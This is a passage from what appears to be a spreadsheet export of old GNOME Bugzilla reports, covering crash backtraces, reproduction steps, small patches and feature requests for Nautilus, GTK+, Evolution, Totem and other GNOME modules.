	factory = (BonoboGenericFactory *) 0x81a4e88
	object = (BonoboObject *) 0x81a4e88
#14 0x40d9558e in _ORBIT_skel_GNOME_ObjectFactory_create_object ()
   from /usr/lib/liboaf.so.0
No symbol table info available.
#15 0x40dd5a1c in ORBit_POA_handle_request () from
/usr/lib/libORBit.so.0
No symbol table info available.
#16 0x40dd85f9 in ORBit_handle_incoming_request () from
/usr/lib/libORBit.so.0
No symbol table info available.
#17 0x40df0f7b in giop_main_handle_connection () from
/usr/lib/libIIOP.so.0
No symbol table info available.
#18 0x40d93bcc in orb_handle_connection () from /usr/lib/liboaf.so.0
No symbol table info available.
#19 0x40fb9076 in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#20 0x40fba97e in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#21 0x40fbae59 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#22 0x40fbb0f4 in g_main_run () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#23 0x40eb96df in gtk_main () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#24 0x402fc53b in bonobo_main () at bonobo-main.c:284
No locals.
#25 0x080aef84 in main ()
No symbol table info available.
#26 0x420158d4 in __libc_start_main () from /lib/i686/libc.so.6
No symbol table info available.
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
Unknown reporter: abejenaru@interakt.ro changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>abejenaru</t>
  </si>
  <si>
    <t>VTE-140765</t>
  </si>
  <si>
    <t>VTE-based terminals replace blank lines with lines of all spaces</t>
  </si>
  <si>
    <t>1) Run (in any GNOME2 environment esp. 2.2+) gnome-terminal or vte twice to
create two windows
2) Start vi in both terminals
3) In one terminal (call it terminal A) type the following text (where blank
lines are nothing except carriage returns):
[...begin text...]
poo
poo
poo
[...end text...]
4) Hilight the text from the first poo to the last in one sweep
5) Enter insert mode in the second terminal (call it terminal B)
6) Paste the text into it
7) Enter command mode in terminal B (hit Esc)
8) Navigate the cursor to one of the blank lines between the poos
9) Hit 0 to go to the beginning of the line and then hit $ to go to the end
of the line and notice that the cursor *should* stay in the same place but it
goes to the end of the line instead
You can use the above steps using xterm as the *source* terminal and pasting
into a vte-derived terminal and you will see that what is pasted is correct.</t>
  </si>
  <si>
    <t>ORCA-347054</t>
  </si>
  <si>
    <t>Orca is not saving settings for table row speaking or verbosity</t>
  </si>
  <si>
    <t>Please describe the problem:
When I change settings for certain options and exit the config UI they are not getting saved.  The two settings are: table row speaking or verbosity
Steps to reproduce:
1. Press CTRL+space to open the config UI
2. Tab to the radio buttons for verbosity and change the value to brief.
3. Tab to the radio buttons for table row reading and change to speak cell.
4.  Press OK
5.  Exit orca and reload
Actual results:
When Orca reloads the settings return to their default.  
Expected results:
The new values should still be set.  
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>TOTEM-428770</t>
  </si>
  <si>
    <t>Move Galago code from lib to the plugin</t>
  </si>
  <si>
    <t>The actual code to interface with libgalago needs to be moved from lib to the Totem Galago plugin.</t>
  </si>
  <si>
    <t>NAUTILUS-41866</t>
  </si>
  <si>
    <t>Turn volume mounting code into an object</t>
  </si>
  <si>
    <t xml:space="preserve">The mount code should ideally be an object.  Then it could fire off a signal 
when mount/unmount events happen.  This would be helpful for the trash code and 
maybe others.
------- Additional Comments From darin@bentspoon.com 2000-08-02 10:36:16 ----
I am assuming that this is work that's required for bug 41855 so marking it
required.
------- Additional Comments From eli@eazel.com 2000-10-16 19:43:58 ----
Batch-assigning QA ownership of remaining bugs to eli@eazel.com
------- Additional Comments From eli@eazel.com 2001-02-09 11:29:12 ----
Duane is now the proud owner for Desktop QA.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:34 -------
Bug blocks bug(s) 41855.
</t>
  </si>
  <si>
    <t>GEDIT-452548</t>
  </si>
  <si>
    <t>Allow drag-and-drop file onto window background</t>
  </si>
  <si>
    <t>If a gedit window has no files loaded it should be possible to drag a file from the file manager and drop it on the window background to load it. At the moment it only works if you drop the file on the toolbar but not on the empty window background.</t>
  </si>
  <si>
    <t>GNOME-POWER-MANAGER-334212</t>
  </si>
  <si>
    <t>Wrong icon when starting on laptop battery</t>
  </si>
  <si>
    <t>Hi
When I start my laptop with AC unplugged the tray icon is most of the time wrong. Sometimes it shows the empty battery sometimes it shows the full battery with AC plugged in. The tooltip is OK saying running on battery - discharging etc.. Once I plugged AC or reload gpm the icon is ok thus I cannot post debug output.
Cheers
Julien</t>
  </si>
  <si>
    <t>GLIB-52067</t>
  </si>
  <si>
    <t>GMarkup SEGV fix and speed improvements</t>
  </si>
  <si>
    <t>The GMarkup test dies with a segfault with fail-8.gmarkup (in case of
errors it tries to report the element it failed in but that is
already freed).
The patch also implements attributes and values as arrays instead of
a list as was discussed a while ago on gtk-devel-list and requires
fewer allocations (it caches the partial_chunck GString): this results
in about 15 % speedup (it's still quite slow though).
A new test case is added.
Oh and it removes about 80 lines of code.
Comments welcome.
lupus</t>
  </si>
  <si>
    <t>lupus</t>
  </si>
  <si>
    <t>EVOLUTION-301270</t>
  </si>
  <si>
    <t>Opening a mail much slower than doing prev/next</t>
  </si>
  <si>
    <t>Please describe the problem:
When I open a mail it takes much longer (3-4 seconds) to open. OTOH when I do
prev/next it comes up in less than half a second.
I am using GroupWise backend for mails through SOAP.
When I looked at the SOAP traces I found out that opening an item is triggering
3 getQuickMessagesRequests (New Modified All) which is what is making it slow.
These requests are not triggered if I click on prev/next to open mails.
Steps to reproduce:
1. Double-click on a mail item to open and measure the time approximately
2. Compare it with opening a previous/next mail
Actual results:
Expected results:
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>MEDUSA-41338</t>
  </si>
  <si>
    <t>Make queries interruptible</t>
  </si>
  <si>
    <t xml:space="preserve">There needs to be some sort of async system to 
interrupt searches that are no longer needed
------- Additional Comments From rebecka@eazel.com 2000-06-13 17:11:58 ----
i don't know how many architecture switches this will require.
some sort of signalling system is needed to allow the search loop to
run asynchronously
------- Additional Comments From bud@eazel.com 2000-08-25 00:52:01 ----
If queries complete quickly this could be moved to after 1.0.
Moving to usable for now.
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:59:25 ----
Doesn't pressing Stop or navigating elsewhere work? If so please reset the
priority of this bug to p6.
------- Additional Comments From rebecka@eazel.com 2000-09-15 13:45:30 ----
This bug concerns the fact that after the search daemon receives a query
there is no way to prevent it from running the entire query.
If a lot of queries get backed up the search daemon will stop responding.
However as bud said queries complete quickly (under a few seconds) so
perhaps we should move this bug to after 1.0.
------- Additional Comments From rebecka@eazel.com 2000-09-20 16:31:04 ----
I think we can avoid this now that the server deals with cancelled 
queries by ignoring them.
As Bud mentioned queries are pretty fast so the value of this feature
to the end user seems dubious.  It's not clear what will be faster or
better if queries can be interrupted.
------- Additional Comments From eli@eazel.com 2000-10-16 12:32:19 ----
Batch assigning Josh as the Quality Engineering contaact for Medusa bugs.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:33 -------
</t>
  </si>
  <si>
    <t>GTK+-61565</t>
  </si>
  <si>
    <t>gtk_text_iter_forward_lines() moves iterator out of buffer bounds</t>
  </si>
  <si>
    <t>gtk_text_iter_forward_lines() may move iterator out of buffer bounds. And
it returns wrong value in this case.
Test case:
#include 
void test (char* str int pos)
int
main (int argc char** argv)
{
    GtkTextIter iter
    gtk_init (
    printf (\One.\ 1\n)
    test (One. 1)
    printf (\n\One.\\nTwo.\ 2\n 2)
    test (One.\nTwo. 2)
}
void 
test (gchar* str int pos)
{
    GtkTextIter iter
    GtkTextBuffer* buffer
    gboolean returns
    gint new_offset
    buffer = gtk_text_buffer_new (NULL)
    gtk_text_buffer_set_text (buffer str strlen (str))
    gtk_text_buffer_get_iter_at_offset(buffer 
    returns = gtk_text_iter_forward_lines (
    new_offset = gtk_text_iter_get_offset (
    printf (returns = %d\n returns)
    printf (new_offset = %d\n new_offset)
}
Output:
One. 1
returns = 0
new_offset = 4
One.\nTwo. 2
returns = 1
new_offset = 10
The function works wrong in the second case. returns should be 0 and
new_offset shouild be 9.</t>
  </si>
  <si>
    <t>NAUTILUS-87801</t>
  </si>
  <si>
    <t>fail of nautilus to show desktop items and navigation window</t>
  </si>
  <si>
    <t>Occassionally when logging into gnome my desktop items do not appear.
I also try running nautilus from the program menu and it fails to appear.
I run a ps -ef | grep nautilus and find three entries ( apart from ps )
which I cannot kill.
Nautilus appears not to have crashed but its just invisible !
I find I have to do a full system reboot to fix</t>
  </si>
  <si>
    <t>gordon.rouse</t>
  </si>
  <si>
    <t>GPDF-147869</t>
  </si>
  <si>
    <t>[UI-Review] Umbrella Bug</t>
  </si>
  <si>
    <t>This is the bug representing the ui-review of the gpdf for the 2.7/2.8
release of GNOME</t>
  </si>
  <si>
    <t>GNOME-POWER-MANAGER-468509</t>
  </si>
  <si>
    <t>Some grammar issues</t>
  </si>
  <si>
    <t>Documentation 
Section: All of it
I notice a few grammar issues in the gnome-power-manager documentation. Just a few minor it's issues mostly. 
Correct version:
The right thing
Other information:
I'll attach a patch in a minute.</t>
  </si>
  <si>
    <t>EOG-424350</t>
  </si>
  <si>
    <t>crash in Image Viewer: clicking next photo</t>
  </si>
  <si>
    <t>Version: 2.16.1
What were you doing when the application crashed?
clicking next photo
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.1 2006-10-02 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 136744960 vsize: 0 resident: 136744960 share: 0 rss: 59932672 rss_rlim: 0
CPU usage: start_time: 1175221792 rtime: 0 utime: 5972 stime: 0 cutime:5636 cstime: 0 timeout: 336 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/eog'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1226614592 (LWP 13616)]
[New Thread -1288254560 (LWP 13619)]
[New Thread -1228129376 (LWP 13617)]
(no debugging symbols found)
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb768034b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0xb7d1f1b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
#3  
#4  0xb7e5e8a2 in _XReply () from /usr/lib/libX11.so.6
#5  0xb7e55a5a in XSync () from /usr/lib/libX11.so.6
#6  0xb78e5a95 in gdk_flush () from /usr/lib/libgdk-x11-2.0.so.0
#7  0xb78c1785 in gdk_image_new () from /usr/lib/libgdk-x11-2.0.so.0
#8  0xb78c1a7e in _gdk_image_get_scratch () from /usr/lib/libgdk-x11-2.0.so.0
#9  0xb78cd171 in gdk_rgb_xpixel_from_rgb () from /usr/lib/libgdk-x11-2.0.so.0
#10 0x08072c6e in eog_scroll_view_scrollbars_visible ()
#11 0x08074afd in eog_scroll_view_get_zoom_is_min ()
#12 0xb7727aa1 in g_source_is_destroyed () from /usr/lib/libglib-2.0.so.0
#13 0xb7729802 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#14 0xb772c7df in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#15 0xb772cb89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#16 0xb7a5f574 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#17 0x08063fa9 in main ()
Thread 3 (Thread -1228129376 (LWP 13617)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb767c816 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0x0806ec42 in eog_job_manager_add ()
No symbol table info available.
#3  0xb774738f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb7679504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb760d51e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 2 (Thread -1288254560 (LWP 13619)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb767c816 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0x0806ec42 in eog_job_manager_add ()
No symbol table info available.
#3  0xb774738f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb7679504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb760d51e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 1 (Thread -1226614592 (LWP 13616)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb768034b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7d1f1b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0xb7e5e8a2 in _XReply () from /usr/lib/libX11.so.6
No symbol table info available.
#5  0xb7e55a5a in XSync () from /usr/lib/libX11.so.6
No symbol table info available.
#6  0xb78e5a95 in gdk_flush () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#7  0xb78c1785 in gdk_image_new () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#8  0xb78c1a7e in _gdk_image_get_scratch () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#9  0xb78cd171 in gdk_rgb_xpixel_from_rgb () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#10 0x08072c6e in eog_scroll_view_scrollbars_visible ()
No symbol table info available.
#11 0x08074afd in eog_scroll_view_get_zoom_is_min ()
No symbol table info available.
#12 0xb7727aa1 in g_source_is_destroyed () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#13 0xb7729802 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#14 0xb772c7df in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#15 0xb772cb89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#16 0xb7a5f574 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#17 0x08063fa9 in main ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>harun.abd.assami</t>
  </si>
  <si>
    <t>GNOME-SOFTWARE-782317</t>
  </si>
  <si>
    <t>Gnome Software doens't use properly primary-toolbar styled headerbar in Unity</t>
  </si>
  <si>
    <t>Created attachment 351328
gs-shell: use headerbar in toolbar-mode in Unity
In Gnome-Software the headerbar in unity is used as a toolbar but without applying the proper .primary-toolbar class which leads to make impossible to use Unity themes properly in other environments (as GS) as they try to apply a toolbar-like theme to any headerbar that is not a titlebar (which might be in cases in other apps where custom headerbar widgets are heavily used).</t>
  </si>
  <si>
    <t>EVOLUTION-257643</t>
  </si>
  <si>
    <t>refresh period foo</t>
  </si>
  <si>
    <t>Add a web-calender
Select a refresh period of every '2 days'
Right-click properties
select 'Remote'
Note 'Refresh interval' is labeled '2 minute(s)'
Is it really days or minutes ? [ rather worried now ]</t>
  </si>
  <si>
    <t>TOTEM-320271</t>
  </si>
  <si>
    <t>[GST 0.8] Visual effects when playing music are shown even if I disable it in preference</t>
  </si>
  <si>
    <t>Hi
playing a ogg file go to preference and disable the visual effects.
now randomly if I move a window over totem window the visual effects appear again.
A related thing is I'm playing an ogg and then go to preference and Enable the
visual effects then visual effects doesn't appear they appear when I change
current song to other.</t>
  </si>
  <si>
    <t>GNOME-PANEL-487051</t>
  </si>
  <si>
    <t>blurry icon problem</t>
  </si>
  <si>
    <t>Ever since some icon themes decided to ship 22 icons (instead of the 24 that can be nicely scaled dowm from 48x48) the panel has been in a bad position: using 22 icons means that all the app icons which are only available in 24 or 48 come out blurry which using 24 means that the size 22 icons come out badly. 
I'll attach a patch that I recently added to the Fedora panel package to address this issue. It makes the panel use 24 icons and changes it to accept anything between 22 and 24 unscaled. A slightly too small icon is preferable to a blurry one...</t>
  </si>
  <si>
    <t>GTK+-73243</t>
  </si>
  <si>
    <t>Use glib-makeenums for GDK</t>
  </si>
  <si>
    <t>Currently GKD is still using it's own version of the makenums
perl script should be switched to using the installed 
glib-mkenums.</t>
  </si>
  <si>
    <t>RHYTHMBOX-138050</t>
  </si>
  <si>
    <t>Imports files that clearly aren't music</t>
  </si>
  <si>
    <t>When importing a directory full of files Rhythmbox adds every file it finds to
the library regardless of whether or not the file is actually a music file. 
This clutters the library with bogus entries for things that can't ever be played.
To reproduce select Music -&gt; Import Folder and choose a folder with at least
one non-music file in it.  It will be added to the library.
For example after importing a folder full of SPC files (which Rhythmbox can't
play) and a few text files (which Rhythmbox definitely can't play) rhythmdb.xml
has entries like this:
    Runaway5Bus3.spc
    Unknown
    Unknown
    Unknown
    -1
    -1
    66048
    file:///mnt/wily/music/EarthBound/Runaway5Bus3.spc
    1043077080
    2.500000
    1
    readme.txt
    Unknown
    Unknown
    Unknown
    -1
    -1
    643
    file:///mnt/wily/music/EarthBound/readme.txt
    1043077080
    2.500000
    1
    1
    1080185134
    text/plain
It would make sense for Rhythmbox to ignore files with unknown MIME types or
MIME types known not to be music (like text/plain).</t>
  </si>
  <si>
    <t>GNOME-DESKTOP-115006</t>
  </si>
  <si>
    <t>v-2.3.3 build error with gcc-295</t>
  </si>
  <si>
    <t>It happens build error on gnome-about.c with gcc-2.95
So needs patch as follows
--- ./gnome-about/gnome-about.c.orig	2003-06-06 22:00:57.000000000 +0900
+++ ./gnome-about/gnome-about.c	2003-06-12 15:27:30.000000000 +0900
@@ -4589 +4588 @@
 	g_list_free (files)
 	if (error) {
-		g_free (directory)
-
 		char *message
+		g_free (directory)
 		message = g_strdup_printf (_(Unable to load header image: %s)
 					   error-&gt;message)</t>
  </si>
  <si>
    <t>LSR-438714</t>
  </si>
  <si>
    <t>Reorganize Perks/ directory</t>
  </si>
  <si>
    <t>Make subdirs to better separate Perks. Update LSRMain to install Perks properly from their new home locations.
ibm/
gnome/
lsr/
other/</t>
  </si>
  <si>
    <t>GLADE-339849</t>
  </si>
  <si>
    <t>version 2.91.1:'make check' fails because of a missing file</t>
  </si>
  <si>
    <t>Entering directory `/usr/local/src/GARNOME/2.14/garnome-2.14.x/src/hacker-tools/glade-3/work/main.d/glade-3-2.91.1/po'
joseph make[1]: *** No rule to make target `../widgets/gtk+.xml.in' needed by `glade-3.pot'.  Stop
./widgets contains gtk+.xml rather than gtk+.xml.in which is in CVS.
-Joseph
==================================================================</t>
  </si>
  <si>
    <t>TOTEM-327532</t>
  </si>
  <si>
    <t>Switching visualisaton when playing back crash totem</t>
  </si>
  <si>
    <t>Play a mp3 or listen to a webstream in Totem with a visualisation. 
(0.10 backend). When switching visualisation Totem crashes.</t>
  </si>
  <si>
    <t>LIBGNOMEUI-129567</t>
  </si>
  <si>
    <t>battstat-applet-2 should have Accessible Role ALERT</t>
  </si>
  <si>
    <t>[appolgies if I've files this bug against the wrong module]
The GNOME Accessibility project has started a convention that simple
dialogs that present alert type of information should bear the
AccessibleRole of ALERT (instead of frame or some such).  By following this
convention when the dialog appears a screen reader like Gnopernicus would
automatically read the entire contents of the dialog rather than just the
titlebar which is what happened to me when my laptop informed me that the
batter was now fully recharged!</t>
  </si>
  <si>
    <t>EVINCE-308142</t>
  </si>
  <si>
    <t>image not displayed</t>
  </si>
  <si>
    <t>Version details: 0.3.1-0ubuntu1
images in the document
http://www.adobe.com/products/photoshop/pdfs/linear_gamma.pdf are not displayed
in Evince.
xpdf however does.</t>
  </si>
  <si>
    <t>EVOLUTION-209845</t>
  </si>
  <si>
    <t>mail component crash</t>
  </si>
  <si>
    <t>Description of Problem:
When I try to open a preview (in the lower part under the list of messages)
for a mail the mail component crashes. This problem is deterministic and
the same problem is when I try to import such mail.
Steps to reproduce the problem:
1. click on a mail in the list of mails
Actual Results:
crash
Expected Results:
show the content of the mail
How often does this happen? 
everytime
Additional Information:
Czech locale (cs_CZ)
charset in Evolution = ISO-8859-2
Evolution (0.13) and required libraries downloaded from Ximian Gnome 1.4
distribution on 8th September 2001
I can naturally send the mbox file with undisplayable mails.</t>
  </si>
  <si>
    <t>dan.horak</t>
  </si>
  <si>
    <t>NAUTILUS-42670</t>
  </si>
  <si>
    <t>Theme selection not maintained between user levels</t>
  </si>
  <si>
    <t xml:space="preserve">To Reproduce: Select a theme then switch your user level. The theme changes. We
shouldn't punish a user for advancing their user level by resetting thier theme.
------- Additional Comments From andy@eazel.com 2000-09-01 11:22:35 ----
I agree this was fixed in the last couple of days.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:38 -------
</t>
  </si>
  <si>
    <t>LIBGDA-410200</t>
  </si>
  <si>
    <t>MySQL: segmentation violation</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Extract attached .tgz file
2. Run the mysql client program and run the script dbinit.sql to create a test database.
3. Compile/run the seg_viol client.
Stack trace:
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1213536576 (LWP 10525)]
0xb7b7b150 in strcmp () from /lib/tls/libc.so.6
(gdb) bt
#0  0xb7b7b150 in strcmp () from /lib/tls/libc.so.6
#1  0xb7f3b41c in gda_query_get_field_by_sql_naming_fields (query=0x804b368
    sql_name=0x80af588 p.Birthday fields_list=0x8090180) at gda-query.c:3259
#2  0xb7f3acec in gda_query_get_field_by_sql_naming (query=0x804b368
    sql_name=0x80af588 p.Birthday) at gda-query.c:3114
#3  0xb7f636b8 in parsed_create_field_query_field (query=0x804b368 add_to_query=1
    pdata=0x8082718 field_names=0x80865a0 try_existing_field=1 new_field=0xbf9d4ca4
    target_return=0x0 error=0xbf9d4d18) at gda-query-parsing.c:1285
#4  0xb7f633a5 in parsed_create_global_query_field (query=0x804b368 add_to_query=1
    pdata=0x8082718 field=0x806fd28 try_existing_field=1 new_field=0xbf9d4ca4
    target_return=0x0 error=0xbf9d4d18) at gda-query-parsing.c:1190
#5  0xb7f64a99 in parsed_create_func_query_field (query=0x804b368 add_to_query=1
    pdata=0x8082718 funcname=0x806fd18 Month funcargs=0x80865b0
    try_existing_field=1 new_field=0xbf9d4d64 error=0xbf9d4d18)
    at gda-query-parsing.c:1751
#6  0xb7f6350e in parsed_create_global_query_field (query=0x804b368 add_to_query=1
    pdata=0x8082718 field=0x806fd88 try_existing_field=1 new_field=0xbf9d4d64
    target_return=0xbf9d4d6c error=0x0) at gda-query-parsing.c:1210
#7  0xb7f654c3 in parsed_create_simple_condition (query=0x804b368 pdata=0x8082718
    sqlcond=0x806fe10 try_existing_field=1 targets_return=0x0 error=0x0)
    at gda-query-parsing.c:1960
#8  0xb7f64f50 in parsed_create_complex_condition (query=0x804b368 pdata=0x8082718
    where=0x806fe28 try_existing_field=1 targets_return=0x0 error=0x0)
    at gda-query-parsing.c:1848
#9  0xb7f6503c in parsed_create_complex_condition (query=0x804b368 pdata=0x8082718
    where=0x806fef0 try_existing_field=1 targets_return=0x0 error=0x0)
    at gda-query-parsing.c:1864
#10 0xb7f611a8 in parsed_create_select_query (query=0x804b368 select=0x806ff08
    error=0x0) at gda-query-parsing.c:330
#11 0xb7f358a3 in gda_query_set_sql_text (query=0x804b368
    sql=0x8048ba0 select p.id p.FirstName p.MiddleName p.LastName p.Birthday addr.* from Person p left join  (SELECT pa.PersonID a.Line1 a.Line2 c.City pr.Name a.PostalCode FROM PersonAddress pa Address a C... error=0x0) at gda-query.c:1381
#12 0xb7f33cd1 in gda_query_new_from_sql (dict=0x8050a90
    sql=0x8048ba0 select p.id p.FirstName p.MiddleName p.LastName p.Birthday addr.*---Type  to continue or q  to quit---
 from Person p left join  (SELECT pa.PersonID a.Line1 a.Line2 c.City pr.Name a.PostalCode FROM PersonAddress pa Address a C... error=0x0) at gda-query.c:713
#13 0x08048941 in main (argc=1 argv=0xbf9d4ff4) at seg_viol.c:57
(gdb) quit
Other information:
In stack frame #1 the call to gda_query_target_get_represented_table_name returned NULL.
I suspect this means that the dictionary was not properly initialized due to insufficient privilege for my database user.
Obviously an error should be issued rather than crashing. If my suspicion is correct this error would be best issued at the time of initializing the dictionary.  Also the function at stack frame #1 needs to be modified to handle the NULL return without crashing.</t>
  </si>
  <si>
    <t>LIBWNCK-332264</t>
  </si>
  <si>
    <t>Missing link against libXRes</t>
  </si>
  <si>
    <t>libwnck/util.c uses XResQueryClientResources() and other XRes functions if HAVE_XRES is true but it does not link against libXRes. That means those symbols to be unresolved in the libwnck shared library which can cause undefined symbol errors when linking against libwnck. The linking issue arises from configure.in:
## Check for XRes
AC_CHECK_LIB(XRes XResQueryExtension
             X_LIBS=$X_LIBS -lXRes -lXext  AC_DEFINE_UNQUOTED(HAVE_XRES 1 [define if you have the XRes library]) 
             $X_LIBS -lXext)
The test knows that -lXRes is valid but then doesn't use it when compiling libwnck.
This is in libwnck-2.12.3 and also CVS HEAD.</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-582783</t>
  </si>
  <si>
    <t>Get rid of deprecated libgnome(ui)</t>
  </si>
  <si>
    <t>GNOME 3 will not ship libgnome/ui anymore.
See http://live.gnome.org/LibgnomeMustDie .
For the status of your module see the automatic statistics at http://www.gnome.org/~fpeters/299.html (updated every two hours).
$:andre\&gt; cd gnome-system-tools/
$:andre\&gt; grep -r libgnome .
./src/common/gst-tool.c:       #include 
./src/common/gst-tool.c:       #include 
./src/common/gst-tool.c:       #include 
./src/boot/boot-druid.h:       #include 
./gnome-system-tools.spec.in:  %define libgnomeui_version 2.0.0
./gnome-system-tools.spec.in:  Requires: libgnomeui &gt;= %{libgnomeui_version}</t>
  </si>
  <si>
    <t>NAUTILUS-165755</t>
  </si>
  <si>
    <t>Replace eel_make_uri_from_input_with_trailing_ws with the gnome-vfs equivalent</t>
  </si>
  <si>
    <t>The summary says it all again! :)</t>
  </si>
  <si>
    <t>NAUTILUS-122265</t>
  </si>
  <si>
    <t>Crash when trying to access non-existing vfs-url</t>
  </si>
  <si>
    <t>Distribution: Unknown
Package: nautilus
Severity: normal
Version: GNOME2.4.0 2.4.0
Gnome-Distributor: GNOME.Org
Synopsis: Crash when trying to access non-existing vfs-url
Bugzilla-Product: nautilus
Bugzilla-Component: general
Bugzilla-Version: 2.4.0
BugBuddy-GnomeVersion: 2.0 (2.4.0.1)
Description:
Description of the crash:
Crash when trying to access non-existing vfs-url
Steps to reproduce the crash:
1. Access smb:// or blaat:// or meh:// or foo://
Expected Results:
Some error message but not a crash.
How often does this happen?
Always
Additional Information:
I don't have gnome-vfs-extras installed only gnome-vfs
Debugging Information:
Backtrace was generated from '/usr/bin/nautilus'
[New Thread 16384 (LWP 18308)]
[New Thread 32769 (LWP 18309)]
[New Thread 16386 (LWP 18310)]
[New Thread 32771 (LWP 18311)]
[New Thread 49156 (LWP 18314)]
[New Thread 65541 (LWP 18315)]
0x40b70bb9 in __wait4 () at __wait4:-1
	in __wait4
#0  0x40b70bb9 in __wait4 () at __wait4:-1
#1  0x40bf1458 in __DTOR_END__ () from /lib/libc.so.6
#2  0x408dccd3 in waitpid (pid=-512 stat_loc=0xfffffe00 options=-512)
    at wrapsyscall.c:181
#3  0x40234b06 in libgnomeui_segv_handle (signum=6) at
gnome-ui-init.c:738
#4  0x408dea4d in __pthread_sighandler (signo=6 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 0 edi = 1083055680 esi = 18308 ebp = 3221215256 esp =
3221215228 ebx = 18308 edx = 1083054916 ecx = 6 eax = 0 trapno = 0
err = 0 eip = 1085194193 cs = 35 __csh = 0 eflags = 2097734
esp_at_signal = 3221215228 ss = 43 __ssh = 0 fpstate = 0xbfffd580
oldmask = 2147483648 cr2 = 0}) at sighandler.c:38
#5  
#6  0x40aebfd1 in __kill () at __kill:-1
#7  0x408da69d in pthread_kill (thread=3221214592 signo=-512) at
signals.c:65
#8  0x408daa1b in raise (sig=0) at signals.c:181
#9  0x40aed51c in *__GI_abort () at ../sysdeps/generic/abort.c:88
#10 0x40973eda in g_logv (log_domain=0x0 log_level=G_LOG_LEVEL_ERROR 
    format=0x400c65a0 file %s: line %d (%s): should not be reached 
    args1=0xbfffddfc) at gmessages.c:509
#11 0x40973f94 in g_log (log_domain=0x0 log_level=G_LOG_LEVEL_ERROR 
    format=0x400c65a0 file %s: line %d (%s): should not be reached)
    at gmessages.c:528
#12 0x4007597e in nautilus_file_get_internal (uri=0x8416578 blaat:
create=0)
    at nautilus-file.c:361
#13 0x40075a98 in nautilus_file_get_existing (uri=0x8416578 blaat:)
    at nautilus-file.c:397
#14 0x40067487 in nautilus_directory_get_existing_corresponding_file (
    directory=0x81d5190) at nautilus-directory.c:454
#15 0x400612fb in nautilus_directory_invalidate_count_and_mime_list (
    directory=0x81d5190) at nautilus-directory-async.c:2128
#16 0x400613ee in nautilus_directory_force_reload_internal (
    directory=0x81d5190 file_attributes=4095)
    at nautilus-directory-async.c:2167
#17 0x400abd19 in vfs_force_reload (directory=0x81d5190)
    at nautilus-vfs-directory.c:132
#18 0x40069c03 in nautilus_directory_force_reload (directory=0x81d5190)
    at nautilus-directory.c:1595
#19 0x0807e6b0 in begin_location_change (window=0x81bdbf0 
    location=0x83cec10 blaat://
type=NAUTILUS_LOCATION_CHANGE_STANDARD 
    distance=0 scroll_pos=0x0) at nautilus-window-manage-views.c:1539
#20 0x0807d46b in open_location (window=0x81bdbf0 
    location=0x83cec10 blaat:// force_new_window=0
new_selection=0x0)
